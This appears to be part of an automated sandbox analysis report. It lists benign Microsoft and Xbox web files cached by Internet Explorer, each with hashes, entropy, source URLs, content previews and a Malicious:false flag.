                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):5109
                                                                                                                                                                                                              Entropy (8bit):5.118496102533826
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:9yRLDkGDGQeG9UfG2maev58hcl/FguMziiKp9bfkbXH/0RKZy:9yRLPDGQeG92G2maev6KlFguMzMbfkbS
                                                                                                                                                                                                              MD5:E118A9C15F6A649384F76DD008BDEE73
                                                                                                                                                                                                              SHA1:7E02125C645D41BF34F268EEFD35DAC8E2CCF100
                                                                                                                                                                                                              SHA-256:C5AF8980AD43586DA80FB13BDAF0858F563907D477ED4800768C817EB8C8E499
                                                                                                                                                                                                              SHA-512:6E33EBA6297F547D94249A65AE1715632936FE78AB5438E5E37229CD8F880ECEEC4DB367CA19C43D299EA1A0A3A4A466D724C22794485E86A9EBEF6E650562D9
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://www.microsoft.com/onerfstatics/marketingsites-neu-prod/mscomhp/_scrf/js/themes=default/89-144c00/a4-539297?ver=2.0&_cf=20210415
                                                                                                                                                                                                              Preview: require(["jqReady!"],function(n){function a(n,t,i){i.setAttribute(s,"false");nt();n.contentWindow.postMessage({action:"open"},t);o||(o=document.getElementById(b));o.style.display="none";o.getAttribute(s).toLowerCase()==="false"&&o.setAttribute(s,"true")}function k(){y()}function d(){var n,u;t||(t=document.getElementById(r));i||(i=t.getAttribute(e));t||(t=document.getElementById(r));i||(i=t.getAttribute(e));n="";window._pageBITags&&window._pageBITags.pageTags&&(n=window._pageBITags.pageTags.pageName);u=t.getAttribute("data-lpcurl");t.contentWindow.postMessage({lppagename:n},i);t.contentWindow.postMessage({lpcurl:u},i)}function v(n){t||(t=document.getElementById(r));i||(i=t.getAttribute(e));t.contentWindow.postMessage({invite:n},i)}function y(){t||(t=document.getElementById(r));i||(i=t.getAttribute(e));f||(f=t.getAttribute("data-isOfficeCommercial").toLowerCase()==="true"?"Office365":"Store");t.contentWindow.postMessage({action:"parentsize",Width:window.innerWidth,Height:window.innerHeig
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\app[1].css
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines, with CRLF, LF line terminators
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):262641
                                                                                                                                                                                                              Entropy (8bit):4.9463902181496096
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3072:u+Vd0pBbqPLYoyjFkxD2hAYwJb8ILm731Ss:u+Vd0DePLYoyjFkxD2hAYwJbZLM31Ss
                                                                                                                                                                                                              MD5:7C593B06759DB6D01614729D206738D6
                                                                                                                                                                                                              SHA1:0D4F76D10944933B8DDECFFE9691081439A77A3C
                                                                                                                                                                                                              SHA-256:F7D9FB0479DE843CF3FB0B78FC56BBB9E30BF0A238C6F79D9209FA8B22EFB574
                                                                                                                                                                                                              SHA-512:EF91B610CF17A17AAFB48984B4403EF175EB86096E3F12E23AE8D4C7C96EF60ED14DA3F69721E095CD2ACE3F0A06190186D000992823814BB906F7FB3576C2C1
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://assets.onestore.ms/cdnfiles/external/oneui/oneui1.16.2/dist/css/app.css
                                                                                                                                                                                                              Preview: @font-face {. font-family: "wf_segoe-ui_normal";. src: url("//i.s-microsoft.com/fonts/segoe-ui/west-european/normal/latest.eot");. src: url("//i.s-microsoft.com/fonts/segoe-ui/west-european/normal/latest.eot?#iefix") format("embedded-opentype"), url("//i.s-microsoft.com/fonts/segoe-ui/west-european/normal/latest.woff") format("woff"), url("//i.s-microsoft.com/fonts/segoe-ui/west-european/normal/latest.ttf") format("truetype"), url("//i.s-microsoft.com/fonts/segoe-ui/west-european/normal/latest.svg#web") format("svg");. font-weight: normal;. font-style: normal; }..@font-face {. font-family: "wf_segoe-ui_light";. src: url("//i.s-microsoft.com/fonts/segoe-ui/west-european/light/latest.eot");. src: url("//i.s-microsoft.com/fonts/segoe-ui/west-european/light/latest.eot?#iefix") format("embedded-opentype"), url("//i.s-microsoft.com/fonts/segoe-ui/west-european/light/latest.woff") format("woff"), url("//i.s-microsoft.com/fonts/segoe-ui/west-european/light/latest.ttf") format("truetype
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\authorize[1].htm
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines, with CRLF, LF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):159629
                                                                                                                                                                                                              Entropy (8bit):5.495439858669957
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3072:BSI+BtRhg/MbZwouiqnnYJBa0ebb9ngYwniQuGb:BF+jhZwo+YZelngJuc
                                                                                                                                                                                                              MD5:BD89C4A423A5A8292C947DF070A0223D
                                                                                                                                                                                                              SHA1:FFD9E60F4CA7A7167614C30E093C9E8AA002E353
                                                                                                                                                                                                              SHA-256:0B670231843FB39365EA010FDC10578DF3D25430A791F96B73CF884BE6EC0B2F
                                                                                                                                                                                                              SHA-512:433FFB059327E1F8FE3415D34D20314B6ED3E75A132A36700A716B92850B5C4949462091A0DF3FC564F0217766652B436753915A637454EA40CDDB129B7759A8
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: .... Copyright (C) Microsoft Corporation. All rights reserved. -->..<!DOCTYPE html>..<html>..<head>.. <title>Redirecting</title>.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=2.0, user-scalable=yes">.. <meta http-equiv="Pragma" content="no-cache">.. <meta http-equiv="Expires" content="-1">.. <meta name="PageID" content="FetchSessions" />.. <meta name="SiteID" content="" />.. <meta name="ReqLC" content="1033" />.. <meta name="LocLC" content="en-US" />.... ..<meta name="robots" content="none" />....<script type="text/javascript">//<![CDATA[.$Config={"urlGetCredentialType":"https://login.microsoftonline.com/common/GetCredentialType?mkt=en-US","urlGoToAADError":"https://login.live.com/oauth20_authorize.srf?client_id=ee272b19-4411-433f-8f28-5c13cb6fd407\u0026scope=openid+profile+offline_acce
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\azuremediaplayer.min[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):620423
                                                                                                                                                                                                              Entropy (8bit):5.728631442716718
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12288:LBq+eT6V6R4aV05SDYSICrpYlFMcC1RocZBBMTtDDyYszjL43urfp53YhRjg2sjn:LBq+eT6E65tPuf
                                                                                                                                                                                                              MD5:E497E6868B3C48B534610B6446969A77
                                                                                                                                                                                                              SHA1:9E8394E2914897517783EAD4B3279AEE3BE7686E
                                                                                                                                                                                                              SHA-256:C45F7559DDBC271AF8A56DC959304FB511D76A40249CAB3EC31C67B79B2D2BA8
                                                                                                                                                                                                              SHA-512:4E0900E091FBDD32ABE653E72CEE1BD8DD0E576A67D500C65685FE517892D6F6DA7762DC1FE90D25721F8B6519B1B39854ADA9F7C72F2EB610F658C53DA09BF2
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://amp.azure.net/libs/amp/1.8.0/azuremediaplayer.min.js
                                                                                                                                                                                                              Preview: /* Azure Media Player v1.8.0 | (c) 2015 Microsoft Corporation */..function _handleMultipleEvents(n,t,i,r){vjs.arr.forEach(i,function(i){n(t,i,r)})}function _logType(n,t){var i,u,r;i=Array.prototype.slice.call(t);u=function(){};r=window.console||{log:u,warn:u,error:u};n?i.unshift(n.toUpperCase()+":"):n="log";vjs.log.history.push(i);i.unshift("VIDEOJS:");r[n].apply?r[n].apply(r,i):r[n](i.join(" "))}function ObjectIron(n){var t;for(t=[],i=0,len=n.length;i<len;i+=1)n[i].isRoot?t.push("root"):t.push(n[i].name);var e=function(n,t){var i;if(n!==null&&t!==null)for(i in n)n.hasOwnProperty(i)&&(t.hasOwnProperty(i)||(t[i]=n[i]))},u=function(n,t,i){var o,s,r,u,f;if(n!==null&&n.length!==0)for(o=0,s=n.length;o<s;o+=1)r=n[o],t.hasOwnProperty(r.name)&&(i.hasOwnProperty(r.name)?r.merge&&(u=t[r.name],f=i[r.name],typeof u=="object"&&typeof f=="object"?e(u,f):i[r.name]=r.mergeFunction!=null?r.mergeFunction(u,f):u+f):i[r.name]=t[r.name])},r=function(n,t){var f=n,o,c,s,l,h,i,e;if(f.children!==null&&f.childr
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\caba6646-02b5-4ccd-9b16-7f230ce43166[1].svg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):788
                                                                                                                                                                                                              Entropy (8bit):5.41595675917442
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:TMHdPNMuNi/nzVJ/KYf3nSKpOwgHWajuNGZW2VIKtjqDj2a9DfNv:2dauNATLf3SKTgjiNGZWyI+aNft
                                                                                                                                                                                                              MD5:C78A3330F685EF2CFBA0AAC7DC19FF87
                                                                                                                                                                                                              SHA1:37AEC81C034CE5CB90C5AF00FA05C2704CAC8240
                                                                                                                                                                                                              SHA-256:4EBB25B8997ED9139FA7C8C0B88E56614B721FCFAFA91DA484524D4211CC75AA
                                                                                                                                                                                                              SHA-512:1898792267ABE8C148937242F2019C727DA8378E611AF5EF59D2CD41565B90ABCE1006EC8609D2C69023754E13657490ADDDB1F1F80F8DB7DA007E4A2B6158E4
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://compass-ssl.xbox.com/assets/ca/ba/caba6646-02b5-4ccd-9b16-7f230ce43166.svg?n=Homepage-FY20_Home-Icons-0_Consoles_72x56-02.svg
                                                                                                                                                                                                              Preview: <?xml version="1.0" encoding="utf-8"?>. Generator: Adobe Illustrator 24.3.0, SVG Export Plug-In . SVG Version: 6.00 Build 0) -->.<svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px".. viewBox="0 0 72 56" style="enable-background:new 0 0 72 56;" xml:space="preserve">.<style type="text/css">...st0{fill:#FFFFFF;}...st1{fill:#107C10;}.</style>.<rect class="st0" width="72" height="56"/>.<g>..<path class="st1" d="M32.9,11.1c-0.7-0.7-1.8-0.7-2.4,0c-0.3,0.3-0.5,0.7-0.5,1.2c0,0.5,0.2,0.9,0.5,1.2c0.3,0.3,0.7,0.5,1.2,0.5...c0.5,0,0.9-0.2,1.2-0.5c0.3-0.3,0.5-0.7,0.5-1.2C33.4,11.9,33.3,11.5,32.9,11.1z"/>..<path class="st1" d="M24.3,4.9v46.2h23.4V4.9H24.3z M30,27.7v20h-2.2V8.3h16.5v39.3H33.4v-20H30z"/>.</g>.</svg>.
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\cartcount[1].htm
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:HTML document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):3849
                                                                                                                                                                                                              Entropy (8bit):4.393500974386876
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:EyHgyYFGMEZo9yHgyYFGMEZo9yHgyYFGMEZoK:eyYPEZmyYPEZmyYPEZP
                                                                                                                                                                                                              MD5:F6EBD525BB6CE38AF598B7FA00839729
                                                                                                                                                                                                              SHA1:B4FD0C93DBADC9EE88AD416DB3CC71A6A3E20ACE
                                                                                                                                                                                                              SHA-256:09A8F6493E96A6314DCFBD6221BFA606189A03407F3EA9D053877A805BD92A23
                                                                                                                                                                                                              SHA-512:3F91DDDAE7D1EB738191FB7701239130C10D4BF32B6C2C05FCDA9E95DAC77CD5094906BB4197DB26F31B0631DBFF898D0F50FB6461C9D13BB7BAC59CFA5D7FC7
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: ......<!DOCTYPE html>..<html>..<head>.. <title>title</title>..</head>..<body>.. <script>.. function getCartItemCountFromCookie() {.. var name = 'cartItemCount=';.. var allCookies = document.cookie.split(';');.. for (var i = 0; i < allCookies.length; i++) {.. var c = allCookies[i];.. while (c.charAt(0) === ' ') {.. c = c.substring(1);.. }.. if (c.indexOf(name) === 0) {.. return c.substring(name.length, c.length);.. }.. }.. return 0;.. }.... var count = getCartItemCountFromCookie();.... var parentHost = '';.. var parentOriginProtocol = '';.. var parentOrigin = '';.. try {.. parentHost = parent.location.hostname || '';.. parentOriginProtocol = parent.location.protocol;.. parentOrigin = parent.location.origin;.. } catch {..
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\de-ch[1].htm
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:HTML document, UTF-8 Unicode text, with very long lines, with CRLF, LF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):185730
                                                                                                                                                                                                              Entropy (8bit):5.4195261287947964
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:qHmIRWJ9Zm4nzKF5ZHyKh1LGYhz3jEj9TNfHx7EmI9oNCdB7YaddeD0G4djOa2lY:qlRULUiY1f7YaddeD0G6jOa2l9mcev
                                                                                                                                                                                                              MD5:8C9B8AA4008D26D6584B8290B11DFE44
                                                                                                                                                                                                              SHA1:50F485CAA53BED2CB87F77BD77AB0FBF314259BA
                                                                                                                                                                                                              SHA-256:7606ADDF2F3B9825998ABF24CC05EA003133475BA78A91C41CE281A9F493A9EE
                                                                                                                                                                                                              SHA-512:AEE0341A2D9AC089097C2F5DCA9F2E2E6D10179459CB61553AA43AB812ADBBEBB82839F1E860CBD1D8334E27242A3849E9197B5FA840399EEDFF17FB1933FABE
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: ......<!DOCTYPE html>..<html lang="de-ch" dir="ltr">..<head data-info="{&quot;v&quot;:&quot;1.0.7797.2686&quot;,&quot;a&quot;:&quot;7d074bde-da4d-4579-9d38-5e4a25f075e4&quot;,&quot;cn&quot;:&quot;OneDeployContainer&quot;,&quot;az&quot;:&quot;{did:92e7dc58ca2143cfb2c818b047cc5cd1, rid: OneDeployContainer, sn: marketingsites-prod-odnortheurope, dt: 2018-05-03T20:14:23.4188992Z, bt: 2021-05-07T09:29:32.0000000Z}&quot;,&quot;ddpi&quot;:&quot;1&quot;,&quot;dpio&quot;:&quot;&quot;,&quot;dpi&quot;:&quot;1&quot;,&quot;dg&quot;:&quot;uplevel.web&quot;,&quot;th&quot;:&quot;default&quot;,&quot;m&quot;:&quot;de-ch&quot;,&quot;l&quot;:&quot;de-ch&quot;,&quot;mu&quot;:&quot;de-ch&quot;,&quot;rp&quot;:&quot;/de-ch/&quot;,&quot;f&quot;:null,&quot;bh&quot;:{}}">.. <meta charset="UTF-8" />.... <meta http-equiv="x-ua-compatible" content="ie=edge" />.. <meta name="viewport" content="width=device-width, initial-scale=1" />.. <title>Microsoft . Offizielle Homepage</title>.. ..
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\e3-082b89[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):111975
                                                                                                                                                                                                              Entropy (8bit):5.23061719734599
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:uzUHQTAz7pxhX2OG+59gEkpCI+IX8BJWxFu209RhY8WOyd1EwgXA9GKamAMKSAAU:uzUzpxJIS20y9d1EwgXA95KScDCE4+
                                                                                                                                                                                                              MD5:B262085F48671616EFE0257B98C3F466
                                                                                                                                                                                                              SHA1:AA207DB69ECACA2D8198803A8A0AF654D9C0823C
                                                                                                                                                                                                              SHA-256:C63CC1C08E9AD6D4EAB20045A3D5AD6E0B712486E676C45830217714E280C451
                                                                                                                                                                                                              SHA-512:17F99F9A70CAFE636D8DEC9EFE2AC6AB26F64C699020923F0C70C5B4C0B7304A99C0FFBCF0103C6F92C0BB295C46B085CAD52D811ED2BB3E2D6F9067E0FB03D3
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://www.microsoft.com/onerfstatics/marketingsites-neu-prod/microsoft-365/_scrf/js/themes=default/2f-63ce8f/2d-7a9063/dc-7e9864/4f-5115f8/7d-266f10/4a-abd94b/6d-c07ea1/9d-b58f60/f6-aa5278/cd-23d3b0/6d-1e7ed0/b7-cadaa7/c4-898cf2/ca-40b7b0/4e-ee3a55/3e-f5c39b/c3-6454d7/f9-7592d3/92-10345d/f8-73a5f2/79-499886/7e-cda2d3/69-13871c/b7-0ad59f/91-97a04f/1f-100dea/33-abe4df/17-f90ef1/e3-082b89?ver=2.0&_cf=20210415
                                                                                                                                                                                                              Preview: var __extends;define("ajaxWithAnimation",["jqReady!","jsll"],function(n,t){var i=["<div class='c-progress f-indeterminate-","regional","' style='margin:","0","px auto' tabindex='0' role='progressbar'><span><\/span><span><\/span><span><\/span><span><\/span><span><\/span><\/div>"],u=function(t,r){var u=n(t),o,f,e;u.length&&(o=(r.loaderType||"").toUpperCase(),i[1]=o==="PROGRESS"||o==="PROGRESSBAR"?"regional":o==="SPINNERLARGE"?"local f-progress-large f-center":"local f-progress-small",r.margin&&r.margin.length&&(i[3]=r.margin),f=i.join(""),e=(r.loaderPosition||"").toUpperCase(),e==="TOP"||e==="BOTTOM"?(u.addClass("ajaxloader"),e==="BOTTOM"?u.append(f):u.prepend(f)):(u.parent().addClass("ajaxloader"),e==="BEFORE"?u.before(f):u.after(f)))},f=function(t,i){var r=n(t),u;r.length&&(u=(i.loaderPosition||"").toUpperCase(),u!=="TOP"&&u!=="BOTTOM"&&(r=r.parent()),r.removeClass("ajaxloader").children().remove(".c-progress"))},r=function(i){i.refreshElement&&u(i.refreshElement,i);var r=n.extend(i,{s
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\en-US[1].htm
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:HTML document, UTF-8 Unicode text, with very long lines, with CRLF, LF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):134999
                                                                                                                                                                                                              Entropy (8bit):4.995544730098761
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:3072:Ul6xQ5rfO3KulsHP1lkky1PdZLtz0YPeRajafUR93u:l0jHP1lkky1PdZLtz0YPeRajafUR9e
                                                                                                                                                                                                              MD5:A340D8D7640AEECA4CEB163F0009F092
                                                                                                                                                                                                              SHA1:7F4C9C3C93CFF990945C5BBC92EE0BBFADA49D26
                                                                                                                                                                                                              SHA-256:5BFDBE26735F98BD62A1B90182AFA88078501BF0A09CA175A8C13EA57A2C2E4D
                                                                                                                                                                                                              SHA-512:EFC3F1C6EC28D8D47E87952F6EC640D6FDB22764686E009DD5E247AC627F7D7F3E2909568E827CDF6E8F6DF86E5382B7782BD937043ABD3B19242B4827D59DEF
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: ..<!DOCTYPE html>..<html lang="en">..<head>....<script src="https://assets.xbox.com/xbcservicewebwww-2104-29112-0-0-main-rolling/www/js/silentauth.js"></script>.. Third party scripts and code linked to or referenced here are licensed to you by the third parties that own such code, not by Microsoft, see ASP.NET Ajax CDN Terms of Use . http://www.asp.net/ajaxlibrary/CDN.ashx. -->..<script src="https://assets.xbox.com/xbcservicewebwww-2104-29112-0-0-main-rolling/shell/js/adobeaudiencemanager.js"></script><script src="//assets.adobedtm.com/launch-ENbcb8955aa2f84046af210e3226cdda04.min.js?v=21042911200"></script>.. ..v 2104.29111.0.0.s 8vVvleM+QiLeclIxvwRxfPd11recbuAL20PjD47BUmk=.r 24809abe-e04c-4dc5-aa0a-9cb51a61ae93.-->.. <link href="/bundles/xboxsplash2016?v=H0fjo_2Sbsy01xVZffoltnApkeNKL-uhW0OTlvyP4t41" rel="stylesheet"/>.... ..<link href="/bundles/UhfMwfOverrides?v=kJx0j-t7cNiHsN_h0yR1lKXO12UiMFMKonWmLXehXs01" rel="stylesheet"/>.... <meta charset="utf-8" />..
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\en-us[1].htm
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:HTML document, UTF-8 Unicode text, with very long lines, with CRLF, LF line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):112345
                                                                                                                                                                                                              Entropy (8bit):5.294520517256162
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:IVu6QnYlOtBdku55wfGMjtTWN5Lmglqa0olF64C/jAd6pfg6NDpiCTNRho6BR3qh:IVpQnYoNku55ytxglM9vkD5HZdRuyp
                                                                                                                                                                                                              MD5:F0447AEB67B1644CB24894590C8F7A8A
                                                                                                                                                                                                              SHA1:6D9EFED15CA92D9EE7825EFCBFAFF8626FBD1356
                                                                                                                                                                                                              SHA-256:7E58E105FEDB6D017D0E535AB9BA5AFBA3ED34DD0FCBC42AA2B35290CEC54DCA
                                                                                                                                                                                                              SHA-512:C9587571F47282BA2CC88392EDBEF82FE6D042A7C72A0CFD1F4DC4AC3E60C8B809ACF918EAB513F6A012D1D43FE7927B9DB259DC3717A05F8A17CDFEF857F969
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: ..........<!DOCTYPE html>..<html lang="en-US" dir="ltr" class="no-js">..<head>...<meta http-equiv="content-type" content="text/html; charset=utf-8" />...<meta http-equiv="X-UA-Compatible" content="IE=edge" />...<meta name="viewport" content="width=device-width, initial-scale=1.0" />...<meta name="format-detection" content="telephone=no">......<meta name="360-site-verification" content="6cc44c63f0485333da3d68c64f40327e" />....<meta name="baidu-site-verification" content="OEtL59dJdg" />....<meta name="google-site-verification" content="q0yvU7Q1ye3C9wA5xvqUMRWbCfwQgf3HF6zz9KWB5EQ" />....<meta name="msvalidate.01" content="807DB211F373FA8944F95197B4C49C4A" />....<meta name="yandex-verification" content="4b769cdaed4df4ab" />..............<meta property="og:image" content="//support.office.com/SocImages/SOC_SharingImage_720x405.png" />..........<title>Microsoft Support</title>...<link href="/SocContent/webfont.css" rel="stylesheet"/>.....<link href="/SocContent/css?v=2eS0xWHCnh8ZTVf3yTPnMESV
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\errorPageStrings[1]
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):3470
                                                                                                                                                                                                              Entropy (8bit):5.076790888059907
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:z9UUiqRxqH211CUIRHERyRyntQRXaR8RS6C87a/5/+mhPcF+5g+mOC53B5Fqs1qP:JsUOHaQyYX4yJQOWCbz1Qb5
                                                                                                                                                                                                              MD5:6B26ECFA58E37D4B5EC861FCDD3F04FA
                                                                                                                                                                                                              SHA1:B69CD71F68FE35A9CE0D7EA17B5F1B2BAD9EA8FA
                                                                                                                                                                                                              SHA-256:7F7D1069CA8A852C1C8EB36E1D988FE6A9C17ECB8EFF1F66FC5EBFEB5418723A
                                                                                                                                                                                                              SHA-512:1676D43B977C07A3F6A5473F12FD16E56487803A1CB9771D0F189B1201642EE79480C33A010F08DC521E57332EC4C4D888D693C6A2323C97750E97640918C3F4
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:res://ieframe.dll/errorPageStrings.js
                                                                                                                                                                                                              Preview: .//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "The security certificate presented by this website was not issued by a trusted certificate authority.";..var L_CertExpired_TEXT = "The security certificate presented by this website has expired or is not yet valid.";..var L_CertCNMismatch_TEXT = "The security certificate presented by this website was issued for a di
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\favicon-32x32[1].png
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:PNG image data, 32 x 32, 8-bit colormap, non-interlaced
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):631
                                                                                                                                                                                                              Entropy (8bit):6.391875872958697
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:6v/7s6UVprYe6IZeuLgou+/CAztgbbvCR00aJzS4VQIjXuYEMwoQIjXuHBOLPMdo:hX7rRkf+/rMcCJzAIjNEMwNIj8Efl9
                                                                                                                                                                                                              MD5:FB2ED9313C602F40B7A2762ACC15FF89
                                                                                                                                                                                                              SHA1:8A390D07A8401D40CBC1A16D873911FA4CB463F5
                                                                                                                                                                                                              SHA-256:B241D02FAB4B17291AF37993EB249F9303EB5897610ABAFAC4C9F6AA6A878369
                                                                                                                                                                                                              SHA-512:9CBCF5C7B8409494F6D543434ECAFF42DE8A2D0632A17931062D7D1CC130D43E61162EEDB0965B545E65E0687DED4D4B51E29631568AF34B157A7D02A3852508
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview: .PNG........IHDR... ... .....D.......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<...{PLTE.P".J$x......P".P".J$x.........K..K..K..D.o..w..w..w.........................................................P"...................$tRNS.DD...CC..DEC..CEDDEC..CED...CC...DD.c,8....bKGD(........pHYs...........~.....tIME....."4...4...QIDAT8...G.. ...Q..s....?......s.f..a`.A... .bA!..,/dYQ.....a.((j^.m?4..Q.?.....2>.........%tEXtdate:create.2020-05-28T22:34:52+02:00.t.....%tEXtdate:modify.2020-05-28T22:34:52+02:00.)<'...WzTXtRaw profile type iptc..x.....qV((.O..I.R..#..c..#.K.... D.4.d.#.T ...........H.J.....t.B5.....IEND.B`.
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\favicon[1].ico
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:MS Windows icon resource - 6 icons, 128x128, 16 colors, 72x72, 16 colors
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):17174
                                                                                                                                                                                                              Entropy (8bit):2.9129715116732746
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                                                                                                                                                              MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                                                                                                                                                              SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                                                                                                                                                              SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                                                                                                                                                              SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://www.microsoft.com/favicon.ico?v2
